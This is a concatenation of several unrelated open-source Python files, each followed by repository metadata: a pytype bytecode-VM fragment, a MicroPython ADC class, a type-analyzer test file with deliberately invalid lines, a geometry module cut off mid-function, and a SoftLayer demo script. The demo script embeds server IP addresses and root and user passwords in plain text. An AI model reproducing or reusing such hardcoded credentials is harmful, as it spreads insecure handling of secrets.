self.store_jump(op.target, state.forward_cfg_node())
return state
def byte_JUMP_ABSOLUTE(self, state, op):
self.store_jump(op.target, state.forward_cfg_node())
return state
def byte_SETUP_LOOP(self, state, op):
return self.push_block(state, "loop", op.target)
def byte_GET_ITER(self, state):
state, seq = state.pop()
state, it = self.load_attr(state, seq, "__iter__")
state = state.push(it)
return self.call_function_from_stack(state, 0, [])
def store_jump(self, target, state):
self.frame.states[target] = state.merge_into(self.frame.states.get(target))
def byte_FOR_ITER(self, state, op):
self.store_jump(op.target, state.pop_and_discard())
state, f = self.load_attr(state, state.top(), "next")
state = state.push(f)
try:
return self.call_function_from_stack(state, 0, [])
except StopIteration:
return state
def byte_BREAK_LOOP(self, state):
return state.set_why("break")
def byte_CONTINUE_LOOP(self, state, op):
# This is a trick with the return value.
# While unrolling blocks, continue and return both have to preserve
# state as the finally blocks are executed. For continue, it's
# where to jump to, for return, it's the value to return. It gets
# pushed on the stack for both, so continue puts the jump destination
# into return_value.
# TODO(kramm): This probably doesn't work.
self.return_value = op.target
return state.set_why("continue")
def byte_SETUP_EXCEPT(self, state, op):
# Assume that it's possible to throw the exception at the first
# instruction of the code:
self.store_jump(op.target, self.push_abstract_exception(state))
return self.push_block(state, "setup-except", op.target)
def byte_SETUP_FINALLY(self, state, op):
# Emulate finally by connecting the try to the finally block (with
# empty reason/why/continuation):
self.store_jump(op.target, state.push(None))
return self.push_block(state, "finally", op.target)
def byte_POP_BLOCK(self, state):
state, _ = state.pop_block()
return state
def byte_RAISE_VARARGS_PY2(self, state, op):
"""Raise an exception (Python 2 version)."""
# NOTE: the dis docs are completely wrong about the order of the
# operands on the stack!
argc = op.arg
exctype = val = tb = None
if argc == 0:
if state.exception is None:
raise exceptions.ByteCodeTypeError(
"exceptions must be old-style classes "
"or derived from BaseException, not NoneType")
exctype, val, tb = state.exception
elif argc == 1:
state, exctype = state.pop()
elif argc == 2:
state, val = state.pop()
state, exctype = state.pop()
elif argc == 3:
state, tb = state.pop()
state, val = state.pop()
state, exctype = state.pop()
# There are a number of forms of "raise", normalize them somewhat.
if isinstance(exctype, BaseException):
val = exctype
exctype = type(val)
state = state.set_exception(exctype, val, tb)
if tb:
return state.set_why("reraise")
else:
return state.set_why("exception")
def byte_RAISE_VARARGS_PY3(self, state, op):
"""Raise an exception (Python 3 version)."""
argc = op.arg
cause = exc = None
if argc == 2:
state, cause = state.pop()
state, exc = state.pop()
elif argc == 1:
state, exc = state.pop()
return self.do_raise(state, exc, cause)
def byte_RAISE_VARARGS(self, state, op):
if self.python_version[0] == 2:
return self.byte_RAISE_VARARGS_PY2(state, op)
else:
return self.byte_RAISE_VARARGS_PY3(state, op)
def byte_POP_EXCEPT(self, state): # Python 3 only
state, block = state.pop_block()
if block.type != "except-handler":
raise VirtualMachineError("popped block is not an except handler")
return self.unwind_block(block, state)
def byte_SETUP_WITH(self, state, op):
"""Starts a 'with' statement. Will push a block."""
state, ctxmgr = state.pop()
state, exit_method = self.load_attr(state, ctxmgr, "__exit__")
state = state.push(exit_method)
state, enter = self.load_attr(state, ctxmgr, "__enter__")
state, ctxmgr_obj = self.call_function_with_state(state, enter, [])
if self.python_version[0] == 2:
state = self.push_block(state, "with", op.target)
else:
assert self.python_version[0] == 3
state = self.push_block(state, "finally", op.target)
return state.push(ctxmgr_obj)
def byte_WITH_CLEANUP(self, state):
"""Called at the end of a with block. Calls the exit handlers etc."""
# The code here does some weird stack manipulation: the exit function
# is buried in the stack, and where depends on what's on top of it.
# Pull out the exit function, and leave the rest in place.
u = state.top()
if isinstance(u, str):
if u in ("return", "continue"):
state, exit_func = state.pop_nth(2)
else:
state, exit_func = state.pop_nth(1)
v = self.make_none(state.node)
w = self.make_none(state.node)
u = self.make_none(state.node)
elif isinstance(u, type) and issubclass(u, BaseException):
if self.python_version[0] == 2:
state, (w, v, u) = state.popn(3)
state, exit_func = state.pop()
state = state.push(w, v, u)
else:
assert self.python_version[0] == 3
state, (w, v, u) = state.popn(3)
state, (tp, exc, tb) = state.popn(3)
state, (exit_func) = state.pop()
state = state.push(tp, exc, tb)
state = state.push(self.make_none(state.node))
state = state.push(w, v, u)
state, block = state.pop_block()
assert block.type == "except-handler"
state = state.push_block(block.type, block.handler, block.level - 1)
else:
# This is the case when None just got pushed to the top of the stack,
# to signal that we're at the end of the with block and no exception
# occured.
state = state.pop_and_discard() # pop None
state, exit_func = state.pop()
state = state.push(self.make_none(state.node))
v = self.make_none(state.node)
w = self.make_none(state.node)
state, suppress_exception = self.call_function_with_state(
state, exit_func, [u, v, w])
log.info("u is None: %r", self.is_none(u))
err = (not self.is_none(u)) and bool(suppress_exception)
if err:
# An error occurred, and was suppressed
if self.python_version[0] == 2:
state, _ = state.popn(3)
state.push(self.make_none(state.node))
else:
assert self.python_version[0] == 3
state = state.push("silenced")
return state
def byte_MAKE_FUNCTION(self, state, op):
"""Create a function and push it onto the stack."""
argc = op.arg
if self.python_version[0] == 2:
name = None
else:
assert self.python_version[0] == 3
state, name = state.pop()
state, code = state.pop()
state, defaults = state.popn(argc)
globs = self.get_globals_dict()
fn = self.make_function(name, code, globs, defaults)
return state.push(fn)
def byte_MAKE_CLOSURE(self, state, op):
"""Make a function that binds local variables."""
argc = op.arg
if self.python_version[0] == 2:
# The py3 docs don't mention this change.
name = None
else:
assert self.python_version[0] == 3
state, name_var = state.pop()
name = _get_atomic_python_constant(name_var)
state, (closure, code) = state.popn(2)
state, defaults = state.popn(argc)
globs = self.get_globals_dict()
fn = self.make_function(name, code, globs, defaults, closure)
return state.push(fn)
def byte_CALL_FUNCTION(self, state, op):
return self.call_function_from_stack(state, op.arg, [])
def byte_CALL_FUNCTION_VAR(self, state, op):
state, args = self.pop_varargs(state)
return self.call_function_from_stack(state, op.arg, args)
def byte_CALL_FUNCTION_KW(self, state, op):
state, kwargs = self.pop_kwargs(state)
return self.call_function_from_stack(state, op.arg, [], kwargs)
def byte_CALL_FUNCTION_VAR_KW(self, state, op):
state, kwargs = self.pop_kwargs(state)
state, args = self.pop_varargs(state)
return self.call_function_from_stack(state, op.arg, args, kwargs)
def byte_YIELD_VALUE(self, state):
state, self.return_value = state.pop()
return state.set_why("yield")
def byte_IMPORT_NAME(self, state, op):
"""Import a single module."""
full_name = self.frame.f_code.co_names[op.arg]
# The identifiers in the (unused) fromlist are repeated in IMPORT_FROM.
state, (level, fromlist) = state.popn(2)
# The IMPORT_NAME for an "import a.b.c" will push the module "a".
# However, for "from a.b.c import Foo" it'll push the module "a.b.c". Those
# two cases are distinguished by whether fromlist is None or not.
if self.is_none(fromlist):
name = full_name.split(".", 1)[0] # "a.b.c" -> "a"
else:
name = full_name
module = self.import_module(name, _get_atomic_python_constant(level))
if module is None:
log.error("Couldn't find module %r", name)
module = self._create_new_unknown_value("import")
return state.push(module.to_variable(state.node, name))
def byte_IMPORT_FROM(self, state, op):
"""IMPORT_FROM is mostly like LOAD_ATTR but doesn't pop the container."""
name = self.frame.f_code.co_names[op.arg]
module = state.top()
state, attr = self.load_attr(state, module, name, allow_descriptors=False)
return state.push(attr)
def byte_EXEC_STMT(self, state):
state, (unused_stmt, unused_globs, unused_locs) = state.popn(3)
log.warning("Encountered 'exec' statement. 'exec' is unsupported.")
return state
def byte_BUILD_CLASS(self, state):
state, (name, bases, methods) = state.popn(3)
return state.push(self.make_class(state.node, name, bases, methods))
def byte_LOAD_BUILD_CLASS(self, state):
# New in py3
return state.push(__builtins__.__build_class__)
def byte_STORE_LOCALS(self, state):
state, locals_dict = state.pop()
self.frame.f_locals = _get_atomic_value(locals_dict)
return state
def byte_END_FINALLY(self, state):
state, exc = state.pop()
if self.is_none(exc):
return state
else:
log.info("Popping exception %r", exc)
state = state.pop_and_discard()
state = state.pop_and_discard()
return state
def byte_RETURN_VALUE(self, state):
state, var = state.pop()
self.frame.return_variable.PasteVariable(var, state.node)
return state.set_why("return")
def byte_IMPORT_STAR(self, state):
"""Pops a module and stores all its contents in locals()."""
# TODO(kramm): this doesn't use __all__ properly.
state, mod_var = state.pop()
mod = _get_atomic_value(mod_var)
if isinstance(mod, abstract.Unknown):
log.error("Doing 'from module import *' from unresolved module")
return state
log.info("%r", mod)
# TODO(kramm): Add Module type to abstract.py
for name, var in mod.items():
if name[0] != "_":
state = self.store_local(state, name, var)
return state
def byte_SLICE_0(self, state):
return self.get_slice(state, 0)
def byte_SLICE_1(self, state):
return self.get_slice(state, 1)
def byte_SLICE_2(self, state):
return self.get_slice(state, 2)
def byte_SLICE_3(self, state):
return self.get_slice(state, 3)
def byte_STORE_SLICE_0(self, state):
return self.store_slice(state, 0)
def byte_STORE_SLICE_1(self, state):
return self.store_slice(state, 1)
def byte_STORE_SLICE_2(self, state):
return self.store_slice(state, 2)
def byte_STORE_SLICE_3(self, state):
return self.store_slice(state, 3)
def byte_DELETE_SLICE_0(self, state):
return self.delete_slice(state, 0)
def byte_DELETE_SLICE_1(self, state):
return self.delete_slice(state, 1)
def byte_DELETE_SLICE_2(self, state):
return self.delete_slice(state, 2)
def byte_DELETE_SLICE_3(self, state):
return self.delete_slice(state, 3)
| {
"repo_name": "pombredanne/pytype",
"path": "pytype/vm.py",
"copies": "1",
"size": "76296",
"license": "apache-2.0",
"hash": 1407455150932517600,
"line_mean": 35.8757854036,
"line_max": 80,
"alpha_frac": 0.6433626927,
"autogenerated": false,
"ratio": 3.55775238983446,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9661184180375905,
"avg_score": 0.007986180431711088,
"num_lines": 2069
} |
a = [{'accountId': 36364,
'bareMetalInstanceFlag': 0,
'datacenter': {'id': 3, 'longName': 'Dallas', 'name': 'dal01'},
'domain': 'playdom.com',
'fullyQualifiedDomainName': 'alert-mta-02.playdom.com',
'hardwareStatusId': 5,
'hostname': 'alert-mta-02',
'id': 102434,
'manufacturerSerialNumber': 'C81500A17L11083',
'networkComponents': [{'hardwareId': 102434,
'id': 598043,
'ipmiIpAddress': '10.37.12.16',
'ipmiMacAddress': '02:25:90:35:dd:32',
'maxSpeed': 1000,
'modifyDate': '2011-08-15T22:43:41-08:00',
'name': 'mgmt',
'networkVlanId': '',
'port': 0,
'speed': 1000,
'status': 'ACTIVE'},
{'hardwareId': 102434,
'id': 598044,
'macAddress': '00:25:90:35:dd:32',
'maxSpeed': 1000,
'modifyDate': '2011-08-15T22:43:38-08:00',
'name': 'eth',
'networkVlanId': '',
'port': 0,
'primaryIpAddress': '10.37.12.15',
'speed': 1000,
'status': 'ACTIVE'},
{'hardwareId': 102434,
'id': 598045,
'macAddress': '00:25:90:35:dd:33',
'maxSpeed': 1000,
'modifyDate': '2011-08-15T22:43:30-08:00',
'name': 'eth',
'networkVlanId': '',
'port': 1,
'primaryIpAddress': '75.126.118.17',
'speed': 1000,
'status': 'ACTIVE'}],
'networkManagementIpAddress': '10.37.12.16',
'notes': '[Ops:App:2011-11-15]',
'operatingSystem': {'hardwareId': 102434,
'id': 841656,
'manufacturerLicenseInstance': '',
'passwords': [{'createDate': '2012-02-14T15:32:42-08:00',
'id': 943133,
'modifyDate': '2012-02-14T15:32:42-08:00',
'password': 'blahblah',
'port': '',
'softwareId': 841656,
'username': 'root'},
{'createDate': '2012-02-14T15:32:42-08:00',
'id': 943134,
'modifyDate': '2012-02-14T15:32:42-08:00',
'password': 'blahasdf!',
'port': '',
'softwareId': 841656,
'username': 'softlayer'}],
'softwareLicense': {'id': 777,
'softwareDescription': {'controlPanel': 0,
'id': 775,
'manufacturer': 'Ubuntu',
'name': 'Ubuntu',
'operatingSystem': 1,
'requiredUser': 'root',
'upgradeSoftwareDescriptionId': '',
'upgradeSwDescId': '',
'version': '10.04.1-64',
'virtualLicense': 0,
'virtualizationPlatform': 0},
'softwareDescriptionId': 775}},
'primaryBackendIpAddress': '10.37.12.15',
'primaryIpAddress': '75.126.118.17',
'privateIpAddress': '10.37.12.15',
'processorCount': 2,
'serialNumber': 'SL0039617',
'serviceProviderId': 1,
'serviceProviderResourceId': 102434}]
for eachDev in a:
ip=""
hostname=""
loc=""
if ("privateIpAddress" in eachDev.keys()):
ip=eachDev["privateIpAddress"]
if ("hostname" in eachDev.keys()):
hostname=eachDev["hostname"]
if ("datacenter" in eachDev.keys()):
loc=eachDev["datacenter"]
print "IP: %s, HOSTNAME: %s, LOCATION: %s" % (ip,hostname,loc) | {
"repo_name": "thomasvincent/utilities",
"path": "Standalone_Scripts/softlayer_iphostloc_puller/unused_source/demodict.py",
"copies": "1",
"size": "4606",
"license": "apache-2.0",
"hash": 3572778885764497000,
"line_mean": 48.5376344086,
"line_max": 104,
"alpha_frac": 0.3651758576,
"autogenerated": false,
"ratio": 4.70961145194274,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.557478730954274,
"avg_score": null,
"num_lines": null
} |
# Copyright (c) 2020 Peter Hinch
# Released under the MIT License (MIT) - see LICENSE file
import uasyncio as asyncio
import io
MP_STREAM_POLL_RD = const(1)
MP_STREAM_POLL = const(3)
MP_STREAM_ERROR = const(-1)
class AADC(io.IOBase):
def __init__(self, adc):
self._adc = adc
self._lower = 0
self._upper = 65535
self._pol = True
self._last = None
self._sreader = asyncio.StreamReader(self)
def __iter__(self):
b = yield from self._sreader.read(2)
return int.from_bytes(b, 'little')
def _adcread(self):
self._last = self._adc.read_u16()
return self._last
def read(self, n): # For use by StreamReader only
return int.to_bytes(self._last, 2, 'little')
def ioctl(self, req, arg):
ret = MP_STREAM_ERROR
if req == MP_STREAM_POLL:
ret = 0
if arg & MP_STREAM_POLL_RD:
if self._pol ^ (self._lower <= self._adcread() <= self._upper):
ret |= MP_STREAM_POLL_RD
return ret
# *** API ***
# If normal will pause until ADC value is in range
# Otherwise will pause until value is out of range
def sense(self, normal):
self._pol = normal
def read_u16(self, last=False):
if last:
return self._last
return self._adcread()
# Call syntax: set limits for trigger
# lower is None: leave limits unchanged.
# upper is None: treat lower as relative to current value.
# both have values: treat as absolute limits.
def __call__(self, lower=None, upper=None):
if lower is not None:
if upper is None: # Relative limit
r = self._adcread() if self._last is None else self._last
self._lower = r - lower
self._upper = r + lower
else: # Absolute limits
self._lower = lower
self._upper = upper
return self
| {
"repo_name": "peterhinch/micropython-async",
"path": "v3/primitives/aadc.py",
"copies": "1",
"size": "2011",
"license": "mit",
"hash": 1920003651234519000,
"line_mean": 29.0149253731,
"line_max": 79,
"alpha_frac": 0.5638985579,
"autogenerated": false,
"ratio": 3.808712121212121,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9869366032778571,
"avg_score": 0.0006489292667099286,
"num_lines": 67
} |
a = a # e 4
a = 1 # 0 int
l = [a] # 0 [int]
d = {a:l} # 0 {int:[int]}
s = "abc"
c = ord(s[2].lower()[0]) # 0 int # 4 (str) -> int
l2 = [range(i) for i in d] # 0 [[int]]
y = [(a,b) for a,b in {1:'2'}.iteritems()] # 0 [(int,str)]
b = 1 # 0 int
if 0:
b = '' # 4 str
else:
b = str(b) # 4 str # 12 int
r = 0 # 0 int
if r: # 3 int
r = str(r) # 4 str # 12 int
r # 0 <int|str>
l = range(5) # 0 [int]
l2 = l[2:3] # 0 [int]
x = l2[1] # 0 int
k = 1() # 0 <unknown> # e 4
del k
k # e 0
l = [] # 0 [int]
x = 1 # 0 int
while x: # 6 int
l = [] # 4 [int]
l.append(1) # 0 [int] # 2 (int) -> None
l = [1, 2] # 0 [int]
l2 = [x for x in l] # 0 [<int|str>]
l2.append('') # 0 [<int|str>]
s = str() # 0 str
s2 = str(s) # 0 str
s3 = repr() # e 5 # 0 str
s4 = repr(s) # 0 str
x = 1 if [] else '' # 0 <int|str>
l = [1] # 0 [<int|str>]
l2 = [''] # 0 [str]
l[:] = l2 # 0 [<int|str>]
b = 1 < 2 < 3 # 0 bool
l = sorted(range(5), key=lambda x:-x) # 0 [int]
d = {} # 0 {<bool|int>:<int|str>}
d1 = {1:''} # 0 {int:str}
d.update(d1)
d[True] = 1
d # 0 {<bool|int>:<int|str>}
l = [] # 0 [int]
l1 = [] # 0 [<unknown>]
l.extend(l1)
l.append(2)
l = [] # 0 [<[str]|int>]
l1 = [[]] # 0 [[str]]
l.extend(l1)
l[0].append('') # e 0
l.append(1)
l = [] # 0 [[<int|str>]]
l2 = [1] # 0 [int]
l3 = [''] # 0 [str]
l.append(l2)
l.append(l3)
for i, s in enumerate("aoeu"): # 4 int # 7 str
pass
x = 1 # 0 int
y = x + 1.0 # 0 float
y << 1 # e 0
l = [1, 1.0] # 0 [float]
1.0 in [1] # e 0
x = `1` # 0 str
def f():
x = `1` # 4 str
d = dict(a=1) # 0 {str:int}
l = list() # 0 [<unknown>]
i = int(1) # 0 int
i = int(1.2) # 0 int
i = abs(1) # 0 int
i = abs(1.0) # 0 float
d = dict() # 0 {int:int}
d[1] = 2
d2 = dict(d) # 0 {<int|str>:<int|str>}
d2[''] = ''
d3 = dict([(1,2)]) # 0 {int:int}
d4 = dict(a=1) # 0 {str:int}
| {
"repo_name": "kmod/icbd",
"path": "icbd/type_analyzer/tests/basic.py",
"copies": "1",
"size": "1818",
"license": "mit",
"hash": -7669605874459881000,
"line_mean": 16.1509433962,
"line_max": 58,
"alpha_frac": 0.4416941694,
"autogenerated": false,
"ratio": 1.9527389903329753,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.28944331597329753,
"avg_score": null,
"num_lines": null
} |
# aagen.geometry - module encapsulating interactions with the Shapely library.
import logging
import math
import re
import ast
from aagen.direction import Direction
from shapely.coords import CoordinateSequence
from shapely.geometry.point import Point
from shapely.geometry.linestring import LineString
from shapely.geometry.multilinestring import MultiLineString
from shapely.geometry.polygon import Polygon, LinearRing
from shapely.geometry.multipolygon import MultiPolygon
from shapely.geometry.collection import GeometryCollection
import shapely.affinity
from shapely.geometry import box
import shapely.ops
from shapely.validation import explain_validity
log = logging.getLogger(__name__)
def to_string(geometry):
"""Returns a brief (less precise) representation of a geometric object"""
if geometry is None:
return "<None>"
elif hasattr(geometry, "is_empty") and geometry.is_empty:
return "<{0} (empty)>".format(type(geometry).__name__)
elif isinstance(geometry, Point):
return "<Point ({0}, {1})>".format(numstr(geometry.x),
numstr(geometry.y))
elif isinstance(geometry, LineString):
coords = geometry.coords
elif isinstance(geometry, Polygon):
coords = geometry.exterior.coords
elif hasattr(geometry, "geoms"):
return "<{0} ({1})>".format(type(geometry).__name__,
", ".join([to_string(g) for
g in geometry.geoms]))
elif isinstance(geometry, CoordinateSequence):
coords = list(geometry)
elif type(geometry) is list or type(geometry) is tuple:
coords = geometry
else:
raise RuntimeError("to_string: unknown object type {0}"
.format(geometry))
str_list = []
for (x, y) in coords:
str_list.append("({0}, {1})".format(numstr(x), numstr(y)))
return "<{0}: [{1}]>".format(type(geometry).__name__,
", ".join(str_list))
def from_string(string):
"""Convert a string representation back to a list of coordinates"""
string = string.lstrip("<").rstrip(">")
(kind, coords_str) = string.split(":")
coords = ast.literal_eval(coords_str.strip())
return globals()[kind](coords)
def bounds_str(geometry):
"""Returns a brief representation of the bounding box of an object"""
return ("({0})".format(", ".join([numstr(x) for x in geometry.bounds])))
def numstr(value):
"""Converts a number to a string with no trailing zeros"""
return ('%0.2f' % value).rstrip('0').rstrip('.')
def length(line):
"""Returns the Manhattan length of the given line segment.
"""
(point1, point2) = list(line.boundary)
return (math.fabs(point1.x - point2.x) + math.fabs(point1.y - point2.y))
def grid_aligned(line, direction):
"""Returns whether the given line's endpoints are properly grid-constrained.
"""
if (Direction.normal_to(line) != direction and
Direction.normal_to(line) != direction.rotate(180)):
return False
# If the line bends, it is not grid aligned by definition:
if len(line.simplify(0).coords) > 2:
return False
(p1, p2) = list(line.boundary)
if p1.x == p2.x or p1.y == p2.y:
# Vertical or horizontal, promising...
return (math.fmod(p1.x, 10) == 0 and math.fmod(p2.x, 10) == 0 and
math.fmod(p1.y, 10) == 0 and math.fmod(p2.y, 10) == 0)
elif math.fabs(p1.x - p2.x) == math.fabs(p1.y - p2.y):
# 45-degree angle, promising...
return (math.fmod(p1.x, 5) == 0 and math.fmod(p2.x, 5) == 0 and
math.fmod(p1.y, 5) == 0 and math.fmod(p2.y, 5) == 0)
return False
# Geometric manipulation
def translate(shape, dx_or_dir, dy_or_dist):
"""Translate the given shape by the given (dx, dy) or by
the given (direction, distance) and return the
resulting new shape.
"""
assert shape.is_valid
if isinstance(dx_or_dir, Direction):
dx = dx_or_dir.vector[0] * dy_or_dist
dy = dx_or_dir.vector[1] * dy_or_dist
else:
dx = dx_or_dir
dy = dy_or_dist
new_shape = shapely.affinity.translate(shape, dx, dy)
if not new_shape.is_valid and isinstance(new_shape, Polygon):
log.warning("Polygon {0} no longer valid after translating ({1}, {2})??"
.format(to_string(shape), dx, dy))
new_shape = new_shape.buffer(0)
assert new_shape.is_valid, (
"Shape {0} was valid, but after translating by ({1}, {2}) the new "
"shape {3} is not: {4}"
.format(to_string(shape), dx, dy, to_string(new_shape),
shapely.validation.explain_validity(new_shape)))
return new_shape
def rotate(geometry, angle):
"""Rotate the given geometry, vector, or list of points by the given angle,
which can be given in degrees, as a Direction, or as a vector (where east
or (1,0) is an angle of 0 degrees).
"""
if type(geometry) is tuple:
# (x, y) - box and unbox it as a list of one point
return rotate([geometry], angle)[0]
if isinstance(angle, Direction):
return rotate(geometry, angle.degrees)
if type(angle) is tuple:
radians = math.atan2(angle[1], angle[0])
degrees = math.degrees(radians)
else:
degrees = angle
radians = math.radians(degrees)
if type(geometry) is list or type(geometry) is tuple:
output = []
for (x0, y0) in geometry:
(x1, y1) = (x0 * math.cos(radians) - y0 * math.sin(radians),
x0 * math.sin(radians) + y0 * math.cos(radians))
log.debug("({0}, {1}) rotated by {2} degrees is ({3}, {4})"
.format(x0, y0, degrees, x1, y1))
output.append((x1, y1))
return output
else:
return shapely.affinity.rotate(geometry, degrees)
# Geometric construction
def construct_intersection(base_line, base_dir, exit_dir_list, exit_width=None):
"""Construct the polygon describing an intersection between two or more
passages.
If exit_width is unspecified it is assumed to be the same as the base line.
If exit_width is specified it will be used for all exits EXCEPT any exit
in the same direction as the base_dir (i.e., passage continuation).
Returns (polygon, {dir1: line1, dir2: line2, ...})
"""
# Input validation
assert isinstance(base_dir, Direction)
for exit_dir in exit_dir_list:
assert isinstance(exit_dir, Direction)
base_line = line(base_line) # just to be safe
# Make sure the direction we were given matches the base line's orientation
test_dir = Direction.normal_to(base_line)
assert (test_dir.angle_from(base_dir) == 0 or
test_dir.angle_from(base_dir) == 180), \
("{0} must be same as or 180 degrees opposite {1}"
.format(test_dir, base_dir))
base_width = length(base_line)
if exit_width is None:
exit_width = base_width
log.debug("base width: {0}, exit width: {1}".format(base_width, exit_width))
# Categorize the exit directions by their relationship with the base dir
exits_45 = []
exits_90 = []
exits_135 = []
exit_fwd = None
for exit_dir in exit_dir_list:
if exit_dir.rotate(45) == base_dir or exit_dir.rotate(-45) == base_dir:
exits_45.append(exit_dir)
elif (exit_dir.rotate(90) == base_dir or
exit_dir.rotate(-90) == base_dir):
exits_90.append(exit_dir)
elif (exit_dir.rotate(135) == base_dir or
exit_dir.rotate(-135) == base_dir):
exits_135.append(exit_dir)
elif exit_dir == base_dir:
exit_fwd = exit_dir
else:
raise RuntimeError("Unexpected angle between {0} and {1}?!"
.format(base_dir, exit_dir))
new_exits = {}
if exit_fwd:
sweep_dist = exit_width
if ((not base_dir.is_cardinal()) and
(base_dir.rotate(45) in exit_dir_list or
base_dir.rotate(-45) in exit_dir_list or
base_dir.rotate(135) in exit_dir_list or
base_dir.rotate(-135) in exit_dir_list)):
sweep_dist *= 2
if ((base_dir.rotate(135) in exit_dir_list and
base_dir.rotate(-45) in exit_dir_list) or
(base_dir.rotate(-135) in exit_dir_list and
base_dir.rotate(45) in exit_dir_list)):
sweep_dist += base_width
(_, new_exits[exit_fwd]) = sweep(base_line, base_dir, sweep_dist)
exit_fwd_adjust = False
for s in [1, -1]:
exit_135 = base_dir.rotate(135 * s)
if not exit_135 in exit_dir_list:
continue
(shared_point, _) = endpoints_by_direction(base_line, exit_135)
exit_line = point_sweep(shared_point, base_dir.rotate(45*s), exit_width)
if not grid_aligned(exit_line, exit_135):
new_exit_line = translate(exit_line, base_dir, 10)
assert grid_aligned(new_exit_line, exit_135), \
("Even after adjusting from {0}, {1} is not grid-aligned to {2}"
.format(to_string(exit_line), to_string(new_exit_line),
exit_135))
exit_line = new_exit_line
exit_fwd_adjust = True
new_exits[exit_135] = exit_line
for s in [1, -1]:
exit_90 = base_dir.rotate(90 * s)
if not exit_90 in exit_dir_list:
continue
(shared_point, _) = endpoints_by_direction(base_line, exit_90)
exit_line = point_sweep(shared_point, base_dir, exit_width)
new_exits[exit_90] = exit_line
for s in [1, -1]:
exit_45 = base_dir.rotate(45 * s)
if not exit_45 in exit_dir_list:
continue
# 45-degree exits are the trickiest.
# We have a number of cases to consider:
# 1) 45-degree side passage (main continues)
# Here we must not cross the same base wall
# 2) Y-junction (45 degree split in both directions)
# Here we must not cross the base midline
# 3) Simple 45-degree turn (no other exits forward)
# Here we must not cross the opposite base wall
# 4) X-junction
# As in case 1/2/3, but must align with opposite 135-degree exit
(shared_point, other_point) = endpoints_by_direction(base_line, exit_45)
if base_dir in exit_dir_list:
# Case 1. Make way!
base_point = translate(shared_point, exit_45, exit_width)
elif base_dir.rotate(-45 * s) in exit_dir_list:
# Case 2.
if ((base_dir.is_cardinal() and base_width >= exit_width) or
(exit_45.is_cardinal() and base_width >= 2 * exit_width)):
base_point = shared_point
elif base_dir.is_cardinal():
base_point = translate(shared_point, exit_45,
(exit_width - base_width))
elif exit_45.is_cardinal():
base_point = translate(shared_point, exit_45,
round(exit_width - (base_width/2), -1))
else:
# Case 3
base_point = shared_point
if exit_45.is_cardinal() and exit_width > base_width:
base_point = translate(base_point, exit_45,
(exit_width - base_width))
elif base_dir.is_cardinal() and exit_width > 2 * base_width:
base_point = translate(base_point, exit_45,
(exit_width - 2 * base_width))
elif base_dir.is_cardinal() and exit_width < base_width:
base_point = translate(base_point, base_dir,
(base_width - exit_width))
elif exit_45.is_cardinal() and 2 * exit_width < base_width:
base_point = translate(base_point, base_dir,
(base_width - (2* exit_width)))
exit_line = point_sweep(base_point, base_dir.rotate(-45 * s),
exit_width)
if base_dir.rotate(-135 * s) in exit_dir_list:
# Case 4
exit_line = translate(exit_line, base_dir, base_width)
pass
if not grid_aligned(exit_line, exit_45):
new_exit_line = translate(exit_line, base_dir, 10)
assert grid_aligned(new_exit_line, exit_45), \
("Even after adjusting from {0}, {1} is not grid-aligned to {2}"
.format(to_string(exit_line), to_string(new_exit_line),
exit_45))
exit_line = new_exit_line
exit_fwd_adjust = True
new_exits[exit_45] = exit_line
continue
if exit_fwd and exit_fwd_adjust:
new_exits[exit_fwd] = translate(new_exits[exit_fwd], base_dir, 10)
# Construct the polygon describing the intersection between these exits.
(first_point, last_point) = endpoints_by_direction(base_line,
base_dir.rotate(-90))
prev_dir = base_dir.rotate(180)
points = [last_point, first_point]
skip_count = 0
for dir in [base_dir.rotate(-135), base_dir.rotate(-90),
base_dir.rotate(-45), base_dir, base_dir.rotate(45),
base_dir.rotate(90), base_dir.rotate(135)]:
if not dir in exit_dir_list:
skip_count += 1
continue
elif skip_count < 3:
(p1, p2) = endpoints_by_direction(new_exits[dir], prev_dir)
elif skip_count < 5:
(p1, p2) = endpoints_by_direction(new_exits[dir],
prev_dir.rotate(90))
else:
(p1, p2) = endpoints_by_direction(new_exits[dir],
prev_dir.rotate(180))
if dir != prev_dir.rotate(180):
points += intersection_interpolate(points[-1], p1, prev_dir, dir,
points)
points += [p1, p2]
prev_dir = dir
skip_count = 0
if base_dir.rotate(180) != prev_dir.rotate(180):
points += intersection_interpolate(points[-1], last_point, prev_dir,
base_dir.rotate(180), points)
points += [last_point]
new_polygon = polygon(points)
log.debug("exits: {0}, new_polygon: {1}"
.format(exit_dir_list, to_string(new_polygon)))
return (new_polygon, new_exits)
def intersection_interpolate(p0, p1, d0, d1, points_so_far):
"""
Helper function for construct_intersection().
Constructs the intermediate point(s) needed to create a nicely shaped
polygon between two exits.
"""
new_point = intersect(point_sweep(p0, d0.rotate(180), 500),
point_sweep(p1, d1.rotate(180), 500))
if new_point.is_empty:
log.error("Unable to construct intersection between exit segments")
return []
assert isinstance(new_point, Point), \
"intersection {0} is not a Point".format(to_string(new_point))
# Avoid self-intersection and redundant points
if (line(points_so_far).contains(new_point) or
new_point.equals(p0) or new_point.equals(p1) or
(len(points_so_far) > 2 and
line(points_so_far[:-1]).crosses(line(p0, new_point)))):
log.warning("Not adding point {0} as it would self-intersect"
.format(to_string(new_point)))
return []
else:
return [new_point]
def cardinal_to_diagonal(base_line, new_orientation):
"""Convert a cardinal line segment of length X to a diagonal line of
length sqrt(2)/2 * x.
"""
assert isinstance(new_orientation, Direction)
base_line = line(base_line)
base_dir = Direction.normal_to(base_line)
if base_dir.angle_from(new_orientation) > 90:
base_dir = base_dir.rotate(180)
assert base_dir.is_cardinal() and not new_orientation.is_cardinal()
log.debug("Changing base line {0} from {1} to {2}"
.format(to_string(base_line), base_dir, new_orientation))
(x0, y0, x1, y1) = base_line.bounds
# Find the endpoint the new line shares with the base line
if new_orientation.vector[0] > 0:
xa = x1
else:
xa = x0
if new_orientation.vector[1] > 0:
ya = y1
else:
ya = y0
log.debug("shared point: {0}, {1}".format(xa, ya))
# Construct the new endpoint
xb = (x1 - x0)/2 + (base_dir.vector[0] * (y1 - y0)/2)
yb = (y1 - y0)/2 + (base_dir.vector[1] * (x1 - x0)/2)
log.debug("new point: {0}, {1}".format(xb, yb))
new_line = line((xa, ya), (xb, yb))
log.debug("new line is {0}".format(to_string(new_line)))
return new_line
def diagonal_to_cardinal(base_line, new_orientation):
